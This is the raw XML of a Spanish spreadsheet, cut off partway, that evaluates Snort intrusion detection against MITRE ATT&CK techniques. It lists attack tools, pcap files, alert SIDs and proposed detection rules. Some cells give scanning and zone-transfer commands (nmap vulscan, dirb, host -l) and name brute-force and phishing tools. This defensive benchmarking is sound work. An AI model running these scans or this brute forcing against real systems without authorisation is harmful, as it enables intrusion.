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office.chartex+xml" PartName="/xl/charts/chartEx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ms-office.chartstyle+xml" PartName="/xl/charts/style1.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 - Reglas Usadas" sheetId="1" r:id="rId4"/>
    <sheet state="visible" name="(B) - Detecciones - Snort" sheetId="2" r:id="rId5"/>
    <sheet state="visible" name="(C) - Tráfico Legítimo - Snort" sheetId="3" r:id="rId6"/>
    <sheet state="visible" name="(D) - Resultados" sheetId="4" r:id="rId7"/>
    <sheet state="visible" name="(E) - Referencias" sheetId="5" r:id="rId8"/>
    <sheet state="visible" name="(F) - Detecciones - FG" sheetId="6" r:id="rId9"/>
  </sheets>
  <definedNames/>
  <calcPr/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="5762" uniqueCount="1256">
  <si>
    <t>Nombre REGLA</t>
  </si>
  <si>
    <t>Descripción</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve"> </t>
  </si>
  <si>
    <t>TÁCTICA</t>
  </si>
  <si>
    <t>OTRAS TÁCTICAS</t>
  </si>
  <si>
    <t>TÉCNICA</t>
  </si>
  <si>
    <t>ID TÉCNICA</t>
  </si>
  <si>
    <t>SUBTÉCNICA</t>
  </si>
  <si>
    <t>ID SUBTÉCNICA</t>
  </si>
  <si>
    <t>ATAQUE</t>
  </si>
  <si>
    <t>HERRAMIENTA</t>
  </si>
  <si>
    <t>FICHERO PCAP</t>
  </si>
  <si>
    <t>Nº DE INSTANCIAS DE ATAQUE PRINCIPAL</t>
  </si>
  <si>
    <t>Nº DE INSTANCIAS DE ATAQUE COLATERAL</t>
  </si>
  <si>
    <t>SID (sin repetición)</t>
  </si>
  <si>
    <t>#SID</t>
  </si>
  <si>
    <t>Número total de alertas</t>
  </si>
  <si>
    <t>SIDs en legítimo y ataque</t>
  </si>
  <si>
    <t>SIDs</t>
  </si>
  <si>
    <t>#SIDs</t>
  </si>
  <si>
    <t>DETECTABLE POR PATRONES</t>
  </si>
  <si>
    <t>MECANISMO DE DETECCIÓN</t>
  </si>
  <si>
    <t>DETALLES DE IMPLEMENTACIÓN DE ATAQUE</t>
  </si>
  <si>
    <t>PROCESO DE GENERACIÓN DE PCAP</t>
  </si>
  <si>
    <t>VALIDACIÓN DE PCAP</t>
  </si>
  <si>
    <t>FORMATO PCAPNG</t>
  </si>
  <si>
    <t>DETECTABILIDAD</t>
  </si>
  <si>
    <t>ATAQUES COLATERALES</t>
  </si>
  <si>
    <t>VERIFICACIÓN MTU MÁXIMA</t>
  </si>
  <si>
    <t>CONTIENE FLUJOS INCOMPLETOS SIN SYN INICIAL</t>
  </si>
  <si>
    <t>Reconnaissance</t>
  </si>
  <si>
    <t>Active Scanning</t>
  </si>
  <si>
    <t>T1595</t>
  </si>
  <si>
    <t>Vulnerability Scanning</t>
  </si>
  <si>
    <t>T1595.002</t>
  </si>
  <si>
    <t>Escaneo de vulnerabilidades</t>
  </si>
  <si>
    <t>nmap</t>
  </si>
  <si>
    <t>T1595.002.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002911</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010935</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,1421,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,1418,2023753,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2018317</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2034718,2013409,2034730,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2024364</t>
    </r>
  </si>
  <si>
    <t>2010937, 2002911, 2002910, 2010935</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1421,1418,44484,44487,44485,44489,41807,50447,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002911</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010935</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2023753,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2018317</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2034718,2013409,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2034730</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2009358,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2024364</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,2010937,2001689,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002911</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939,2010935</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2100472,2100615,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010936</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2101418,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2006408</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2023753,2007571,2003099,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2018317</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2034718,2013409,2034730,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2024364,1421,1418,44484,44487,44485,44489,41807,50447</t>
    </r>
  </si>
  <si>
    <t>2002752, 2100615, 2010935, 2100472, 2010937, 2002749, 2002910, 2002911</t>
  </si>
  <si>
    <t>SI</t>
  </si>
  <si>
    <t>Regla genérica que detecte el envío de paquetes TCP con flag SYN activado a varios puertos diferentes</t>
  </si>
  <si>
    <t>Ejecución de comando nmap para escaneo de puertos y detección de vulnerabilidades (nmap -sV --script vulscan IP)</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.2</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.2.4</t>
  </si>
  <si>
    <t>NO</t>
  </si>
  <si>
    <t>Wordlist Scanning</t>
  </si>
  <si>
    <t>T1595.003</t>
  </si>
  <si>
    <t>Escaneo de página web</t>
  </si>
  <si>
    <t>Dirb</t>
  </si>
  <si>
    <t>T1595.003-Web_page_scanning1_[2].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>31939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002749,2002752,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009004</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2011085,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2012885</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>31939</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,50447</t>
    </r>
  </si>
  <si>
    <t>Regla genérica que detecte peticiones HTTP hacia muchas URLs diferentes con destino el mismo servidor</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">Ejecucion de comando dirb para escaneo de la estructura de directorios (dirb </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF1155CC"/>
        <sz val="11.0"/>
        <u/>
      </rPr>
      <t>http://IP</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> -w /usr/share/dirb/wordlist/vulns/apache.txt)</t>
    </r>
  </si>
  <si>
    <t>Manual [2] /   3.1.1.1</t>
  </si>
  <si>
    <t>Manual [2]</t>
  </si>
  <si>
    <t>GoBuster</t>
  </si>
  <si>
    <t>T1595.003-Web_page_scanning2_[3].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1434,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1433,1129,1071,1201,2062,43285,1288,940,937,1662,1489,1145,1301,879,1218,845,1213,885,1206,882,1231,1543,1551,839,825,1016,1141,1606,993,886,1877,895,1852,1520,1521,835,849,896,1826,853,43290,887</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101129,2101071,2027261,2022520,2101201,2027250,2101145,2010229,2101016,2100993,2019526,2101877,2027263,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1434</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,1433,1129,1071,1201,2062,43285,1288,940,937,1662,1489,1145,1301,879,1218,845,1213,885,1206,882,1231,1543,1551,839,825,1016,1141,1606,993,886,1877,895,1852,1520,1521,835,849,896,1826,853,43290,887, 2049402</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101129</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2027261,2022520</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2101201</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2027250,2101145,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010229</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101016,2100993</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2019526,2101877</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027263</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1434</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1433,1129,1071,1201,2062,43285,1288,940,937,1662,1489,1145,1301,879,1218,845,1213,885,1206,882</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1231</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1543,1551,839,825,1016,1141,1606,993,886,1877</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>895,1852,1520</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1521</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>835,849,896,1826</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>853,43290,887,50447,41742,33608,42289</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>59258</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2049402</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2101129,2101071,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027261</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2022520</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2101201,2009885,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027250</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2101288,2100937,2101662,2101489,2101145,2010229,2008330,2000560,2100884,2101016,2100993,2010377,2019526,2101877,2101852,2027263,1434,1433,1129,1071,1201,2062,43285,1288,940,937,1662,1489,1145,1301,879,1218,845,1213,885,1206,882,1231,1543,1551,839,825,1016,1141,1606,993,886,1877,895,1852,1520,1521,835,849,896,1826,853,43290,887,50447,41742,33608,42289,59258,2049402</t>
    </r>
  </si>
  <si>
    <t>2002752, 2002749</t>
  </si>
  <si>
    <t xml:space="preserve">Ejecucion de comando GoBuster para escaneo de la estructura de directorios </t>
  </si>
  <si>
    <t>Manual [3] / 3.8.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.4.4</t>
  </si>
  <si>
    <t>Search Open Technical Databases</t>
  </si>
  <si>
    <t>T1596</t>
  </si>
  <si>
    <t>DNS/Passive DNS</t>
  </si>
  <si>
    <t>T1596.001</t>
  </si>
  <si>
    <t>Transferencia de zona DNS</t>
  </si>
  <si>
    <t>T1596.001.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100255,255</t>
    </r>
  </si>
  <si>
    <t>Regla genérica que detecte paquetes TCP dirigidos al puerto 53 que tengan los bytes "Question" igual a 1 y el resto a cero. Además, el campo "Type" debe tomar el valor "00 FC"</t>
  </si>
  <si>
    <t>Ejecución de comando para obtener informacion de la víctima (host -l javier.example.com IP)</t>
  </si>
  <si>
    <t>Manual [2] / 3.1.1.2</t>
  </si>
  <si>
    <t>Phishing for Information</t>
  </si>
  <si>
    <t>T1598</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>T1598.003</t>
  </si>
  <si>
    <t>Recogida de información de la víctima mediante ingeniería social</t>
  </si>
  <si>
    <t>SEToolKit</t>
  </si>
  <si>
    <t>T1598.003.pcapng</t>
  </si>
  <si>
    <t>2002752,2002749,2001117</t>
  </si>
  <si>
    <t>2002752, 2002749, 2001117</t>
  </si>
  <si>
    <t>Detección por listas negras/anomalías que permitan detectar tráfico de red correspondiente a correos electrónicos con enlaces maliciosos</t>
  </si>
  <si>
    <t>Servidor de correo mediante Postfix, Thunderbird, Bind, Dovecot</t>
  </si>
  <si>
    <t>Manual [5] / 3.5.1.1</t>
  </si>
  <si>
    <t>Manual [5]</t>
  </si>
  <si>
    <t>Gather Victim Identity Information</t>
  </si>
  <si>
    <t>T1589</t>
  </si>
  <si>
    <t>Email Addresses</t>
  </si>
  <si>
    <t>T1589.002</t>
  </si>
  <si>
    <t>Recogida de cuentas de correo eléctronico y validación de las mismas</t>
  </si>
  <si>
    <t>theHarvester, bulk-email-verifier</t>
  </si>
  <si>
    <t>T1589.002-Gather_victim_identity_information_[4].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un número elevado de intentos de conexión y mensajes ehlo SMTP procedentes de un mismo origen hacia un servidor, con diferentes destinatarios.</t>
  </si>
  <si>
    <t>Manual [4] / 3.1</t>
  </si>
  <si>
    <t>Manual [4] / B.1</t>
  </si>
  <si>
    <t>Resource Development</t>
  </si>
  <si>
    <t>Compromise Accounts</t>
  </si>
  <si>
    <t>T1586</t>
  </si>
  <si>
    <t>Social Media Accounts</t>
  </si>
  <si>
    <t>T1586.001</t>
  </si>
  <si>
    <t>Fuerza bruta para acceso a web</t>
  </si>
  <si>
    <t>Hydra</t>
  </si>
  <si>
    <t>T1586.001.pcapng</t>
  </si>
  <si>
    <t>1016, 1025, 1071, 1129, 1141, 1145, 1201, 1206, 1213, 1218, 1231, 1288, 1301, 1433, 1434, 1489, 1520, 1521, 1543, 1551, 1606, 1662, 1826, 1852, 1877, 2062, 43285, 43290, 825, 835, 839, 845, 849, 853, 879, 882, 885, 886, 887, 895, 896, 937, 940, 993</t>
  </si>
  <si>
    <t>1016, 1025, 1071, 1129, 1141, 1145, 1201, 1206, 1213, 1218, 1231, 1288, 1301, 1433, 1434, 1489, 1520, 1521, 1543, 1551, 1606, 1662, 1826, 1852, 1877, 2010229, 2018413, 2019526, 2022520, 2027250, 2027261, 2027263, 2049402, 2062, 2100993, 2101016, 2101071, 2101129, 2101145, 2101201, 2101877, 43285, 43290, 825, 835, 839, 845, 849, 853, 879, 882, 885, 886, 887, 895, 896, 937, 940, 993</t>
  </si>
  <si>
    <t>1016, 1025, 1071, 1129, 1141, 1145, 1201, 1206, 1213, 1218, 1231, 1288, 1301, 1433, 1434, 1489, 1520, 1521, 1543, 1551, 1606, 1662, 17429, 1826, 1852, 1877, 2010229, 2018413, 2019526, 2022520, 2027250, 2027261, 2027263, 2049402, 2062, 2100993, 2101016, 2101071, 2101129, 2101145, 2101201, 2101877, 33608, 41742, 42289, 43285, 43290, 50447, 59258, 825, 835, 839, 845, 849, 853, 879, 882, 885, 886, 887, 895, 896, 937, 940, 993</t>
  </si>
  <si>
